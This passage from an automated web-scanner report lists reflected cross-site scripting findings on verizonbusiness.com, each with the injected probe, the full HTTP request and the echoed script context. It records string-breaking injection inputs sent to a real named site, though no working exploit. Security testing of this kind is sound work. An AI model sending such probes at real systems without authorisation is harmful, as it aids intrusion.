Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/solutionsbriefscd27e'%3b22427f4824/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40352
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/solutionsbriefscd27e';22427f4824/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.829. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5167e'%3b8fe5b8ee7e3 was submitted in the REST URL parameter 3. This input was echoed as 5167e';8fe5b8ee7e3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf5167e'%3b8fe5b8ee7e3 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40356
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf5167e';8fe5b8ee7e3'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.830. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b87a4"%3b8edd3e7099d was submitted in the REST URL parameter 3. This input was echoed as b87a4";8edd3e7099d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdfb87a4"%3b8edd3e7099d HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40356
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
RER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdfb87a4";8edd3e7099d";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.831. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 829ad"%3bc41dc0df56c was submitted in the REST URL parameter 1. This input was echoed as 829ad";c41dc0df56c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources829ad"%3bc41dc0df56c/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:45 GMT
Content-Type: text/html
Content-Length: 40706
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources829ad";c41dc0df56c/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM
...[SNIP]...

1.832. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91611'%3b3ca715f4d40 was submitted in the REST URL parameter 1. This input was echoed as 91611';3ca715f4d40 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources91611'%3b3ca715f4d40/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:58 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40706
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources91611';3ca715f4d40/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.833. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b757"%3bc538dbc867b was submitted in the REST URL parameter 2. This input was echoed as 9b757";c538dbc867b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers9b757"%3bc538dbc867b/itsolutions/wp_cloud-computing_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40314
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers9b757";c538dbc867b/itsolutions/wp_cloud-computing_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION
...[SNIP]...

1.834. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea865'%3bfac23192987 was submitted in the REST URL parameter 2. This input was echoed as ea865';fac23192987 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapersea865'%3bfac23192987/itsolutions/wp_cloud-computing_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:17 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40314
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapersea865';fac23192987/itsolutions/wp_cloud-computing_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.835. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5d0d"%3b246f438c336 was submitted in the REST URL parameter 3. This input was echoed as a5d0d";246f438c336 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/itsolutionsa5d0d"%3b246f438c336/wp_cloud-computing_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:24 GMT
Content-Type: text/html
Content-Length: 40314
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers/itsolutionsa5d0d";246f438c336/wp_cloud-computing_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.836. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a3eb'%3b32b8b4069a8 was submitted in the REST URL parameter 3. This input was echoed as 9a3eb';32b8b4069a8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/itsolutions9a3eb'%3b32b8b4069a8/wp_cloud-computing_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:37 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40314
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapers/itsolutions9a3eb';32b8b4069a8/wp_cloud-computing_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.837. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 615bd'%3b71db8f7f03c was submitted in the REST URL parameter 4. This input was echoed as 615bd';71db8f7f03c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf615bd'%3b71db8f7f03c HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:54 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40314
Date: Wed, 17 Nov 2010 00:05:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf615bd';71db8f7f03c'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.838. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3277"%3bfd78377c4db was submitted in the REST URL parameter 4. This input was echoed as a3277";fd78377c4db in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdfa3277"%3bfd78377c4db HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40314
Date: Wed, 17 Nov 2010 00:05:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
rf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdfa3277";fd78377c4db";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.839. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35489"%3b39a80d1ef7b was submitted in the REST URL parameter 1. This input was echoed as 35489";39a80d1ef7b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources35489"%3b39a80d1ef7b/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40750
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources35489";39a80d1ef7b/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SE
...[SNIP]...

1.840. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e72c'%3bfb035a42e8e was submitted in the REST URL parameter 1. This input was echoed as 9e72c';fb035a42e8e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

